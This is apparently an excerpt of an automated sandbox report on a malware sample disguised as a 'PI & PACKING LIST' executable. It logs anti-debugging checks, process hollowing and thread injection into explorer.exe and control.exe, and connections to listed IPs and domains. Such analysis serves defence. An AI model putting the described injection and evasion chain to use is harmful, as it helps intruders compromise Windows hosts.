Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_01232D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F2D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0124D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0124D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012FFDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012E8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_0126BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012B6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe    Code function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B477 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126AC7B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F4496 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01234F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01234F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125B73D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CFF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0130070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01248794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B7794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012737F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012EFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0123C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01268E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012F1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0126A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0124766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_0125AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01247E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012FAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012B46A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01300EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012CFE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012616E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012476E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01278EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01308ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012636CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_012EFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeCode function: 2_2_01279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exe Network Connect: 35.78.89.117 80
      Source: C:\Windows\explorer.exe Network Connect: 162.43.120.154 80
      Source: C:\Windows\explorer.exe Network Connect: 142.250.203.115 80
      Source: C:\Windows\explorer.exe Domain query: www.bengalindex.com
      Source: C:\Windows\explorer.exe Domain query: www.nu2uresale.store
      Source: C:\Windows\explorer.exe Network Connect: 209.99.64.33 80
      Source: C:\Windows\explorer.exe Domain query: www.zkjk888.com
      Source: C:\Windows\explorer.exe Network Connect: 178.128.239.245 80
      Source: C:\Windows\explorer.exe Domain query: www.p-soils.com
      Source: C:\Windows\explorer.exe Domain query: www.cpitherapy.com
      Source: C:\Windows\explorer.exe Domain query: www.gebouwpas.online
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: 1360000
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
      Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
      Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Memory written: C:\Users\user\Desktop\PI & PACKING LIST.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread APC queued: target process: C:\Windows\explorer.exe
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread register set: target process: 3452
      Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3452
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
      Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
      Source: explorer.exe, 00000003.00000000.336206655.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.340849752.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321402743.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
      Source: explorer.exe, 00000003.00000000.331517747.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.263416995.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
      Source: explorer.exe, 00000003.00000000.307333028.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.332009342.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264215848.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Users\user\Desktop\PI & PACKING LIST.exe VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
